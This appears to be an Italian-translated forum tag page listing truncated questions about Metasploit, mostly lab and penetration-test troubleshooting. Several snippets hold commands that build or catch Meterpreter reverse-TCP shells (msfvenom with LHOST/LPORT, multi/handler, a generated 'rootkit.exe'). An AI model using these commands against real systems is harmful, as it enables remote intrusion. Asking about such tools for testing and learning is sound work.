Domande con tag 'metasploit'

2
risposte

un eseguibile backdoor può essere utilizzato su una porta occupata?

Supponiamo che sto facendo un test di penetrazione su una rete che ha un firewall che blocca tutte le porte eccetto 80, 110 e 443. Voglio usare un eseguibile backdoor TCPasploit reverse-TCP scritto in msfpayload per iniziare una connessione con...
posta 22.11.2012 - 18:17
1
risposta

nessus scan contro exploit metasploit

Sto pensando di lanciare scansioni wide nessus (nel senso "range IP") contro gli exploit presenti in metasploit. L'idea è di limitare il numero di plugin in modo che la scansione termini in un tempo ragionevole. (Come nota a margine nessus 5.0 v...
posta 10.04.2012 - 12:59
2
risposte

SambaCry CVE-2017-7494 restituisce "Exploit completato, ma non è stata creata alcuna sessione"

Sto usando questo exploit su msfconsole per sfruttare una VM con samba e la configurazione è la seguente: Module options (exploit/linux/samba/sambacry) Payload options (linux/x64/meterpreter/reverse_tcp) 2 Linux x86_64 -> target vengon...
posta 28.08.2018 - 05:32
1
risposta

La vecchia sintassi per mostrare le opzioni del payload in msfvenom non funziona

Ho provato così tante volte con una sintassi diversa per visualizzare le opzioni del payload in msfvenom. Tuttavia, non riesco a farlo funzionare. Versione 1. [*] exec: msfvenom -p windows/shell/bind_tcp --payload-options Error: Missing re...
posta 03.07.2018 - 08:29
2
risposte

I comandi Meterpreter non funzionano nella shell [chiuso]

Ho usato use multi/handler seguito da set PAYLOAD windows/meterpreter/reverse_tcp poi set LPORT 80 e set LHOST 192.168.0.11 dopo che faccio exploit -j -z e vado sulla mia macchina Windows collegata alla stessa rete e...
posta 01.05.2018 - 01:06
2
risposte

MSFvenom payload con opzioni dinamiche

Utilizzo MSFvenom per esportare il payload TCP inverso di meterpreter. Sebbene funzioni con msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.6.131 LPORT=4444 -f -exe > ~/Desktop/shell_meterpreter.exe , tuttavia vorrei specifi...
posta 17.11.2017 - 06:55
1
risposta

Log Metasploit o informazioni aggiuntive Re: exploit completato, ma non è stata creata alcuna sessione

Quasi tutto il mio laboratorio personale con Metasploit non ha avuto successo. Più comunemente ottengo il messaggio "Exploit completato, ma non è stata creata alcuna sessione". Non so cosa fare dopo che questo accade. C'è un modo per leggere un...
posta 08.10.2017 - 05:51
1
risposta

Metasploit genera un comando che non funziona

Usando windows / smb / ms08_067_netapi exploit e windows / meterpreter / reverse_tcp come payload questo è quello che ottengo: msf payload(reverse_tcp) > generate -f ~/Desktop/rootkit.exe -p windows -t exe [*] Writing 73802 bytes to ~/Deskt...
posta 25.06.2017 - 21:41
1
risposta

exploit Metasploit che non richiede l'interazione dell'utente iniziale

È possibile comporre un vettore di attacco in modo tale da non richiedere inizialmente a una vittima remota di interagire con un utente malintenzionato? Cioè, se il sistema operativo è vulnerabile, si eseguirà la vulnerabilità senza la percezion...
posta 24.10.2017 - 12:29
1
risposta

PSExec non funziona contro Windows XP (metasploit)

Sto seguendo il libro Penetration Testing: A Hands-On Introduction to Hacking di Georgia Weidman. In Ch 13, pagina 296 il psexec di metasploit è usato contro un Professore di Windows XP SP3 (32-bit) , ma ho ricevuto il seguente errore: Exp...
posta 08.04.2017 - 20:05